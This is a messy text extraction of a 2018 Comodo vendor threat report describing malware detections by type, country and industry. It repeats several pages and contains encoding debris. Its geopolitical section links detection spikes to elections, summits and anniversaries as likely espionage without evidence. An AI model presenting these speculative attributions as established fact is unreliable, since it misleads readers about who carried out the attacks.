The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
